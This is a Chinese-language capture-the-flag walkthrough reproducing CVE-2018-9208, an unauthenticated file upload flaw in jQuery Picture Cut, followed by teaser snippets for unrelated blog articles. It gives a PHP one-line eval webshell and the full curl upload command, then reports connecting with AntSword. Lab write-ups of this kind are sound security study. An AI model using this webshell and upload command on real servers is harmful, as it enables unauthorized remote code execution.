jquery-picture-cut 任意文件上传(CVE-2018-9208)

ops/2024/11/26 18:48:31/

目录

1、漏洞描述

2、访问ip:port

3、一句话木马:exploit.php

4、上传一句话木马

5、中国蚁剑连接成功

6、拿到flag


1、漏洞描述

        jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。 jQuery Picture Cut <= v1.1Beta 中未经身份验证的任意文件上传漏洞 复现参考链接:http://www.vapidlabs.com/advisory.php?v=207

2、访问ip:port

3、一句话木马:exploit.php

<?php @eval($_POST['a']);?>

4、上传一句话木马

curl -F "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@exploit.php" http://IP:PORT/jquery-picture-cut/src/php/upload.php

5、中国蚁剑连接成功

6、拿到flag


http://www.ppmy.cn/ops/136898.html

相关文章

进程与线程的区别(详解)(包括线程与进程的调度问题)

前言&#xff1a; 计算机的发展是飞速的&#xff0c;从底层的算术逻辑单元ALU(Arithmetic & Logic Unit)、控制单元CU(Control Unit)&#xff0c;到中央处理器CPU&#xff08;Center Process Unit)。 发展是非常迅速的&#xff0c;如今我们需要要深刻认识计算机&#xff0c…

安全加固方案

交换机安全加固 查看是否关闭未使用的接口 25GE1/0/1、25GE1/0/47、25GE1/0/48需要使用&#xff0c;暂不关闭 system-view # interface Eth-Trunk99 shutdown quit interface Eth-Trunk100 shutdown quit interface Eth-Trunk110 shutdown quit interface 25GE1/…

iOS构建版本以及Hbuilder打iOS的ipa包全流程

目录 Hbuilder打ipa包 打包之前进行应用配置 应用版本号设置 使用广告标识设置 iOS-云打包 下载并转移安装包 使用Transporter提交版本 应用简介 下载应用 账号登录 提交安装包到apple store connect 在apple开发者平台上确认 总结 本篇文章详细的介绍了使用Hbuil…

windows server 2019 启动 nginx 报错

环境 &#xff1a;windows server 2019 &#xff0c;nginx-1.19.7 背景&#xff1a; 自己经常用这个 nginx 包作为 web 服务器。今天发现 部署到 server 2019 上直接报错了。这可是原生的包&#xff0c;我啥也没改&#xff0c;怎么可能报错。而且之前在 其他服务器用都没问题…

Web安全之XSS攻击的防范

XSS&#xff08;跨站脚本攻击&#xff09;是一种常见的网络安全漏洞&#xff0c;攻击者通过在网页中注入恶意脚本&#xff0c;使其在用户的浏览器中执行&#xff0c;从而达到攻击的目的。XSS 攻击主要分为三种类型&#xff1a;反射型 XSS、存储型 XSS 和 DOM 型 XSS。 1. 反射…

从零开始-VitePress 构建个人博客上传GitHub自动构建访问

从零开始-VitePress 构建个人博客上传GitHub自动构建访问 序言 VitePress 官网&#xff1a;VitePress 中文版 1. 什么是 VitePress VitePress 是一个静态站点生成器 (SSG)&#xff0c;专为构建快速、以内容为中心的站点而设计。简而言之&#xff0c;VitePress 获取用 Markdown…

使用Java爬虫时,有哪些性能优化技巧?

在互联网时代&#xff0c;数据的重要性日益凸显&#xff0c;而Java爬虫作为获取数据的重要工具&#xff0c;其性能直接影响数据收集的效率。本文将探讨使用Java爬虫时的性能优化技巧&#xff0c;并提供技术解析和代码示例。 1. 优化网络请求 使用高效的网络库 选择性能优秀的…

基于Opencv的图像处理软件

目录 一、背景及意义介绍背景意义 二、概述一、背景及意义介绍背景意义 三、论文思路解决问题 四、复现过程&#xff08;一&#xff09;图像处理模块二&#xff09;图形界面模块&#xff08;一&#xff09;图像处理模块实现步骤&#xff08;二&#xff09;图形界面模块实现步骤…